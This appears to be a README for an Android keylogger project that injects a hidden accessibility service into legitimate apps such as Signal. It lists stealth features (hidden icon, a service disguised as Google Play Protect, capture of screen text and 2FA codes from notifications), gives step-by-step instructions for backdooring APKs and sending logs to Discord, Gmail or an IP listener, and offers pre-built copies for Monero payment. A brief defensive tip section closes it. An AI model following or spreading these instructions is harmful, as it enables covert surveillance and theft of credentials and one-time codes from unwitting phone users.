I can provide a pre-built APK for a few cups of coffee and give you access to the logs, DM me in Discord "Consulting offered"
Send logs to IP | Gmail | Discord
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Monero: 4A75SgESZjVbTBwKH1wVF3KMCAbHUToEk3kFrgWZ2J8K9CiSnMbQdD2fBw1BPmpHrTTh314MJ3XvkP33isWDgMFQEZuTzut
Android Studio with Google Play Protect on Android version 15 was tested without issue with sending logs or play protect.
Inject.rar in the builders release section
injector does not work on all apps (works on spotify and a few more)
open the Source folder in VS code and search and replace all for 2 instances of "INSERT-WEBHOOK-URL-FROM-YOUR-CHANNEL-BOT" with your own bot token
run: python -m inject
place the apk you want to inject into the apk folder
click inject, wait for it to stop hanging, it's done when there exists text in the box
click on inject
drag and drop the apk into the apktool gui's build tab and hope you win the lottery, if it builds then enable the service
- multi device sorting support
- new GUI!
- hidden icon up to android 13 instead of only 9
- notifications are logged and sent again
- system info sent on service enable
- "should" now alert user to enable the service
- updated the icon and text "general cleanup"
- changed from Battery Health Service to Google Play Protect Service
- new GUI builder with python eel
✅ A fully working backdoored Signal APK with a evil keylogging accessibility service, have a backdoored notes app as well
✅ system info sent on service enable
✅ Supports Android v5 - v13 (minus 12.1, 12.0 works)
✅ full launcher stealth with no app icon on the home screen or launcher
✅ one a a kind custom buffers for improved logging readability
✅ sends notifications even while in a locked state (grabs google code before owner sees it)
✅ grabs almost all text on the screen the user is looking at.
✅ works over WAN without open ports on either end "Discord/Gmail"
✅ works on startup "does not require a reboot"
✅ choose IP | Gmail | Discord for storing logs
✅ includes a custom listener for the IP version "tested and working over WAN on a Linode VPS $5 a month"
✅ keylogs all user input, even external and remote keyboards
✅ asks user to enable the service with a toast and drop down message
✅ includes a GUI builder working in windows and linux
✅ you can choose: | verbose | keylogger only | keylogger and notifications | for sane readability
part 1
part 2
Download APK TOOL GUI and drag and drop the downloaded APK into the decompile tab
nex open up the decompiled folder in a IDE "text editor" that supports opening a folder and doing a search and replace all method like Visual Studio
read the release notes on the vaules to replace, save it then compile with the gui
Use Pounce_keys in your dev workflow to assure your app is protected by keyloggers, this is a must for banking apps and yes some are vulnerable! Example even CalyxOS lock-sceen is vulnerable, fennec's browser URL tab is protected but not web pages. Signal is even vulnerable!
can I protect my passwords from this, even while hacked? Open dev options and under privacy turn off show passwords when typed. don't use acceessibility services...
how do I look for this
CHECK accessibility settings for any downloaded services or if any are on (name don't matter)
thank you for the starstruck badge :)⭐ anysoft keyboard and malwarebytes has no issue with apk
Monero: 4A75SgESZjVbTBwKH1wVF3KMCAbHUToEk3kFrgWZ2J8K9CiSnMbQdD2fBw1BPmpHrTTh314MJ3XvkP33isWDgMFQEZuTzut
come check out my blog https://nullpounce.blog/

If you've found my work to be valuable, I would greatly appreciate your support, Leave a star. Every little bit helps and allows me to keep creating and improving. Thank you for your consideration and support!
https://github.com/OmGodse/Notally original keylog apk forked from https://github.com/shivamsuyal/Android-Keylogger (current version barely uses its code)
icon "https://www.flaticon.com/free-icon/keylogger_8147179?term=keylogger&page=1&position=42&origin=search&related_id=8147179 https://www.flaticon.com/free-icon/hacking_2431702?related_id=2431702&origin=search
https://www.freepik.com/free-vector/cute-cat-computer-with-mouse-cartoon-vector-icon-illustration-animal-technology-icon-concept-isolated-premium-vector-flat-cartoon-style_18537569.htm#query=cat%20keyboard&position=1&from_view=search&track=sph#position=1&query=cat%20keyboard https://www.freepik.com/free-vector/chat-bot-mobile-chatting-isometric-concept_6342161.htm
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note edit ufw rules if hosted online.